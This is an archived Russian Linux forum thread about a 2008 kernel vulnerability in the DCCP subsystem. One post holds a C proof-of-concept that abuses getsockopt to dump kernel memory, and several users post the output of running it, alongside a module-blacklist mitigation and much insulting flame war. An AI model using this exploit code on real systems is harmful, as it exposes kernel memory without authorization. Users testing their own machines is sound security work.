LINUX.ORG.RU

Критическая уязвимость в ядре Linux

 , , ,


0

0

В ядре Linux обнаружена критическая уязвимость, потенциально позволяющая удаленному злоумышленнику выполнить свой код в системе путем отправки специальным образом модифицированного пакета. Проблема вызвана отсутствием проверки валидности параметров пакета в коде подсистемы DCCP (Datagram Congestion Control Protocol).

Уязвимость подтверждена в версии 2.6.18, дополнительно имеются упоминания о наличии данной проблемы в ядрах с 2.6.15 по 2.6.22.

Обновление с исправлением уязвимости, на момент написания новости, было доступно только для Debian GNU/Linux, для Ubuntu обновление находится в процессе подготовки.

Также сообщается о том, что возможность переполнения буфера в коде декодирования ASN.1, используемого в подсистемах CIFS и SNMP NAT, может привести к выполнению кода злоумышленника. Данная проблема была исправлена в вышедших несколько дней назад обновлениях ядра 2.6.25.5 и 2.4.36.6.

>>> Источник (opennet.ru)

Ответ на: комментарий от jackill

#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);

if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");

write(1, mem, BUFSIZE);

return 0;
}

Sylvia ★★★★★
()
Ответ на: комментарий от anonymous

>все бы вопили какая винда дырявая и нет ей оправдания.

Несомненно, ведь там обновления один раз в месяц, а тут практически в течение дня или раньше.

jackill ★★★★★
()
Ответ на: комментарий от jackill

> Несомненно, ведь там обновления один раз в месяц, а тут практически в течение дня или раньше.

Обновление для одного известного дистрибутива вышло одновременно с объявлением бага ;)

mv ★★★★★
()
Ответ на: комментарий от JackYF

> Ну, собственно, и всё :) 

Размечтался, ага.

seva@mini:~/Temp$ lsmod | grep dccp | wc -l 
0 

seva@mini:~/Temp$ ./dccp_proof
SUCCESS

seva@mini:~/Temp$ lsmod | grep dccp
dccp_ccid2              7456  0
dccp_ipv4              21512  2
dccp                   61232  2 dccp_ccid2,dccp_ipv4

sv75 ★★★★★
()
Ответ на: комментарий от Sylvia

andrey@evilhorse ~ $ gcc -o vot_gavno dccp_expl.c
andrey@evilhorse ~ $ ./vot_gavno
socket failure!
andrey@evilhorse ~ $ uname -a
Linux evilhorse 2.6.25-squashfs #2 Sat May 3 13:24:55 EEST 2008 i686 Intel(R) Celeron(R) CPU 2.50GHz GenuineIntel GNU/Linux
andrey@evilhorse ~ $

а теперь обьясните мне, что такое DCCP и зачем оно нужно?

ЗЫ самоконфижные ядра рулят

generatorglukoff ★★
()
Ответ на: комментарий от tommy

>А им самим этого не надо. Как и линукс.

а это плохо. это отдает красноглазым быдло-фанатизмом и бздунством. я вот более 5 лет использую решения на базе и bsd и линя. потому и могу судить что к чему. и не бросаюсь фразами "бзда ненужна". так что мсье бревнище из глаза своего и лоровских бзуднов извольте достать, а потом притензировать

главное линух не нужен, а сюда претесь. как и вантузятники. чисто из садомазохизма? или ЧСВ повышать?

> Поорать только - на это и способны.

сходи погляди, там местный бздунишка zanswer уже отметился

наверняка и тут ниже тоже. сейчас почитаем

black7
()
Ответ на: комментарий от ZANSWER

>А, стандартная тема, все уже привыкли к дырявости ядра Linux, - это Вам не Rock Solid Solaris 10...*RSS10*

о. я был прав. тебе даунишко мало было высера на опеннете? тебе и тут надо облегчиться? этож насколько убога твоя жизнь что ты ходиш по форумам и линух ругаешь =) жаль что родители тебя не научили другим способам поднятия ЧСВ. займись лучше чем то креативным несчастный

black7
()
Ответ на: комментарий от generatorglukoff

ext@test:~$ sudo gcc -o /home/vot_gavno /home/dccc.c ext@test:~$ sudo chmod +x /home/vot_gavno ext@test:~$ /home/vot_gavno SETSOCKOPT: Protocol not available

anonymous
()
Ответ на: комментарий от ZANSWER

>но я за Sun Solaris 10, ИМХО понимающие люди, да поймут...*GOD*

да мы уже давно поняли что ты малолетний идиот верящий в серебрянную пулю. ничего, пойдешь работать, узнаешь что к чему =)

black7
()
Ответ на: комментарий от batter

>Я поражаюсь с того, какую панику народ устраивает изза исправленой уязвимости в тестовой версии ведра, касательно никому не нужного DCCP.

воюющие бздуны и вантузятники изрядно тупили и сливали в тредах за последние полугодие (солнцевские тоже ессно, но за малым их числом оно малозаметно). думается что пытаются хоть так компенсировать сие досадное для них положение

black7
()
Ответ на: комментарий от black7

5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

Sun-ch
()
Ответ на: комментарий от Sun-ch

>5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

Почему по себе судишь? Может ты и читать научился к 30-и годам только, а таблицу умножения до сих пор не асилил - ну, дык, не все ж такие...

Led ★★★☆☆
()
Ответ на: комментарий от Sun-ch

>5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

anonymous
()
Ответ на: комментарий от sv75

угу… надо блеклистить… (и зачем я этот dccp включал?)

vvdm ~ # vim /etc/modprobe.d/blacklist
blacklist dccp
blacklist dccp_ipv4
blacklist dccp_ccid2
:wq
vvdm ~ # update-modules
vvdm ~ # ./a.out
socket failure!

dmiceman ★★★★★
()

Ха-ха, пишите и дальше на Си, любители трахаться с переполнениями буфера.

anonymous
()
Ответ на: комментарий от anonymous

>Ха-ха, пишите и дальше на Си, любители трахаться с переполнением буфера

Никлаус, и ты тут!? Ахтунг парни, Вирт на форуме!!!

anonymous
()

Все, ребятушки, поставил я WindowsXP - вот теперь я себя чувствую в безопасности. К тому же Fx3 работатет и под Windows. Так зачем мне небезопасная ОС?

CtrlAltBs
()
Ответ на: комментарий от anonymous

> несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

А что, за тунеядство и ассоциальное поведение опять сроки дают?

sv75 ★★★★★
()
Ответ на: комментарий от CtrlAltBs

самое главное, что ты ей ни во что не упёрся :)

Binary ★★★★★
()
Ответ на: комментарий от anonymous

Чему школьник может научиться на ЛОРе? Кричать "вендакопец", "резать вдоль" и BSD RIP?.

Sun-ch
()
Ответ на: комментарий от sv75

>> несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

>А что, за тунеядство и ассоциальное поведение опять сроки дают?

+1

anonymous
()
Ответ на: комментарий от anonymous

Я вот только что поставил 3 сервис-пак на XP. Windus теперь не грузиться.

вот и настал виндекапец на отдельно взятом компьютере.

sergeyiv
()
Ответ на: комментарий от anonymous

>>Пэанер, теперь выставь ее голой жьопай в нет!! =))

Да пожалуйста, но у нее задний прохож висит :)

sergeyiv
()
Ответ на: комментарий от anonymous

о, приплюснутые прибежали. эксепшены в ядре - решают! глюки должны быть мощными и убойными.++

anonymous
()
Ответ на: комментарий от sergeyiv

>Я вот только что поставил 3 сервис-пак на XP. Windus теперь не грузиться.

>вот и настал виндекапец на отдельно взятом компьютере.

не только винде, но и грамматике, и не только на компьютере =)

anonymous
()
Ответ на: комментарий от anonymous

>о, приплюснутые прибежали. эксепшены в ядре - решают! глюки должны быть мощными и убойными.++

LOL, в плюсах разве нет проблемы с переполнением буфера? ))) Тот анонимус явно на паскаль или его подобных намекал - это очевидно, как уже и то, что ты красноглазый плюсобоф ))))))))

anonymous
()
Ответ на: комментарий от CtrlAltBs

> Все, ребятушки, поставил я WindowsXP - вот теперь я себя чувствую в безопасности. К тому же Fx3 работатет и под Windows.

Куда теперь будещь девать ненужную oem-глисту?

> Так зачем мне небезопасная ОС?

Это тебя надо спросить, зачем ты её установил.

anonymous
()
Ответ на: комментарий от anonymous

> вот если бы на винде нашли такое, все бы вопили какая винда дырявая и нет ей оправдания. а тут с точностью до наоборот.

В винде нет критических уязвимостей, там все уязвимости классические.

anonymous
()
Ответ на: комментарий от SilentLexx

>По факту: Если код писал человек

даёшь огромных человекоподобных роботов, которые будут писать безошибочный код! ну и охранять границу заодно...

pronvit
()
Ответ на: комментарий от anonymous

Мла, всё тот же унылый флейм на те же доставшие всех темы. Пора двигаться дальше, друзья мои.

anonymous
()

Дыры есть везде. Не повод столько вонять. Это тем кто ту пишет что линух превращается в винду и т.д. Погуглите , по разным ос, везде баги, багфиксы и снова баги. Вполне нормальная ситуация.

anonymous
()
Ответ на: комментарий от black7

Ухаха... свет из Ваших алых глаз меня повергает в ужас, что ещё расскажете обо мне хорошего, жду с нетерпением, жалею только о том, что Вы очередной неудачник, который неспособен не на что, кроме оскарблений, а жаль...:-D:-D:-D

ZANSWER
()
Ответ на: комментарий от black7

Ух... Вы случаем не тот самый анонимный аналитик с интерфейсом в астрал, о котором так много говорят на ЛОР-е??=-O Жду новых открытий, о себе, из Ваших уст, это весьма забавно, наблюдать, как Вас разрывает от злости, что Вы беспомощны что-то изменить...*CRAZY*

ZANSWER
()
Ответ на: комментарий от anonymous

>Ядро на Паскале

что вас пугает?

>причем интерпретируемом...

это тут причем?!

>ВЕЩЕСТВА!

ясно, вопросов больше не имею :)

anonymous
()
Ответ на: комментарий от CtrlAltBs

> Висту я только у знакомых видел

Даже не удосужился её запустить прежде чем стал ставить свинью?

> ибо года два как на Ubuntu был.

Да вижу я в твоих темах как ты был на убунту. И ogg у тебя плеер не держал и папочку с примонтироваными media ты найти не мог.

anonymous
()
Ответ на: комментарий от anonymous

ЛУЧИ ПАСКАЛЯ!111 РАСЧЕХЛЯЕМ ФРИПАСКАЛИ!! ОПТИМИЗ НА ПОЛНУЭ МОЩНОСТЬ!!!11111 ПЫЩЩЩЩЩЩЩЩЩЩЩЩЩЩЩЩЬ ПЫЩ ПЫЩ ПЫЩЩЩЩЩЩ!!!!

anonymous
()
Ответ на: комментарий от ZANSWER

> Вы случаем не тот самый анонимный аналитик с интерфейсом в астрал, о котором так много говорят на ЛОР-е?

Учитывая феерический анализ в виде:

> Вас разрывает от злости > Вы беспомощны что-то изменить

Я вам запишу в диагноз нарушение самоидентификации после деанонимизации.

anonymous
()

[gforgx@ffap ~]$ modprobe -l *dccp*

/lib/modules/2.6.24-ice/kernel/net/netfilter/xt_dccp.ko

Я так понимаю, это не то )

[gforgx@ffap ~]$ ./exploit

socket failure!

[gforgx@ffap ~]$ uname -a

Linux ffap 2.6.24-ice #1 SMP PREEMPT Mon Apr 21 21:25:06 ALMT 2008 i686 Intel(R) Pentium(R) 4 CPU 2.66GHz GenuineIntel GNU/Linux

GFORGX ★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.